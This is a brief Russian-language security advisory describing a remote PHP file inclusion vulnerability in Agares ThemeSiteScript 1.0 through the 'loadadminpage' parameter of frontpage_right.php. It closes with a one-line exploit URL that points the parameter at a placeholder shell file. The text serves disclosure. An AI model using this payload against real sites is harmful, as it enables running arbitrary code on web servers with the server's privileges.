Программа: Agares ThemeSiteScript 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «loadadminpage» сценарием frontpage_right.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?



Оставить мнение